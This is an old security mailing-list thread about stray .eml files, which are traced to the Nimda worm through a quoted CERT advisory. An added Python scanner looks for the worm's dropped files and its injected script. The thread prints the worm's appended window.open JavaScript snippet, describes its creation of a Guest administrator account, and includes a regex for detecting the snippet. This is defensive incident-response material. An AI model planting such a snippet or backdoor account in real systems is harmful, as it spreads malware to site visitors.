The odd thing is it's not putting that javascript into any of my code. That
probably will only work on a windows machine and not thru unix/linux but it
is dropping all the .eml files. I am replacing that machine with a diff
machine so it's not connected to the external network and see what happens.
This way I can try to find out the cause of this.

----- Original Message -----
From: David Correa <tech@linux-tech.com>
To: <security-discuss@linuxsecurity.com>
Cc: Matt Jezorek <matt@bluelinux.org>
Sent: Sunday, November 11, 2001 1:29 PM
Subject: Re: Question about .eml files I am finding

>
> from http://www.cert.org/advisories/CA-2001-26.html
>
> Once running on the server machine, the worm traverses
> each directory in the system (including all those
> accessible through file shares) and writes a MIME-encoded
> copy of itself to disk using file names with .eml or .nws
> extensions (e.g., readme.eml). When a directory containing
> web content (e.g., HTML or ASP files) is found,
> the following snippet of Javascript code is
> appended to every one of these web-related files:
>
> <script language="JavaScript">
> window.open("readme.eml",null, "resizable=no, top=6000, left6000")
> </script>
>
> This modification of web content allows further propagation
> of the worm to new clients through a web browser or
> through the browsing of a network file system.
>
> In order to further expose the machine, the worm
> enables the sharing of the c: drive as C$
> creates a "Guest" account on Windows NT and
> 2000 systems adds this account to the "Administrator"
> group.
>
> Furthermore, the Nimda worm infects existing
> binaries on the system by creating Trojan horse copies of legitimate
> applications. These Trojan horse versions of the
> applications will first execute the Nimda code (further infecting the
> system and potentially propagating the worm), and
> then complete their intended function.
>
> David Correa RHCE CCNA
> tech@linux-tech.com
> http://www.linux-tech.com
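
Added example (not part of the original thread or of the CERT advisory): a Python scanner that walks a directory tree and reports the two file-system indicators the quoted advisory describes, dropped .eml/.nws files and web pages carrying the appended window.open snippet. The function names, the .htm extension and the sample tree are assumptions made for this example.

```python
import os
import re
import tempfile

# Extensions CA-2001-26 names for the worm's dropped MIME copies.
DROPPED_EXTS = {".eml", ".nws"}
# Web content checked for the appended script (the advisory says
# "e.g., HTML or ASP files"; .htm is an assumption added here).
WEB_EXTS = {".html", ".htm", ".asp"}
# window.open() whose first argument is a .eml/.nws file, tolerant of
# whitespace and quoting differences.
INJECTED = re.compile(rb"window\.open\(\s*[\"'][^\"']*\.(?:eml|nws)[\"']", re.I)

def scan(root):
    """Return (dropped, modified): sorted relative paths of .eml/.nws files
    and of web files that contain the window.open snippet."""
    dropped, modified = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in DROPPED_EXTS:
                dropped.append(rel)
            elif ext in WEB_EXTS:
                try:
                    with open(path, "rb") as fh:
                        if INJECTED.search(fh.read()):
                            modified.append(rel)
                except OSError:
                    continue  # unreadable file: skip it, keep scanning
    return sorted(dropped), sorted(modified)

def build_sample_tree(root):
    """Constructed sample data: one modified page, one clean page, one drop."""
    snippet = (b'<script language="JavaScript">\n'
               b'window.open("readme.eml",null, "resizable=no, top=6000, left6000")\n'
               b'</script>\n')
    os.makedirs(os.path.join(root, "docs"))
    with open(os.path.join(root, "index.html"), "wb") as fh:
        fh.write(b"<html><body>ok</body></html>\n" + snippet)
    with open(os.path.join(root, "docs", "about.asp"), "wb") as fh:
        fh.write(b"<html><body>clean</body></html>\n")
    with open(os.path.join(root, "docs", "readme.eml"), "wb") as fh:
        fh.write(b"placeholder, not a real message\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(scan(tmp))
```

A tree that shows dropped files but no modified pages matches what the reply above reports: .eml files present, no script added to the site's own code.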